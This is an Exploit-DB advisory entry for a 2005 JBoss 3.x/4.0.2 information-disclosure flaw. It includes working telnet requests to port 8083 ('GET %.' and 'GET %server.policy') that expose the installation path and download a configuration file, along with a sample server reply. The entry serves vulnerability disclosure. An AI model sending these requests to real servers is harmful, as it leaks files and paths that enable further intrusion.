JBoss 3.x/4.0.2 - HTTP Request Remote Information Disclosure

EDB-ID:

25842


Platform:

Multiple

Published:

2005-06-17

source: http://www.securityfocus.com/bid/13985/info

JBoss is prone to a remote information-disclosure vulnerability. The issue occurs in the 'org.jboss.web.WebServer' class and is due to a lack of sufficient sanitization of user-supplied request data.

Information that attackers can harvest through leveraging this issue may aid in further attacks against the affected service. 

Example 1 (Installation path disclosure): [3.2.x and 4.0.2]
Request:
>>telnet [jbosshost] 8083
>>GET %. HTTP/1.0

Reply:
HTTP/1.0 400 C:\Programme\jboss-4.0.2\server\default\conf (Zugriff
verweigert)
Content-Type: text/html

Example 2 (Config file download): [4.0.2]
Request:
>>telnet [jbosshost] 8083
>>GET %server.policy HTTP/1.0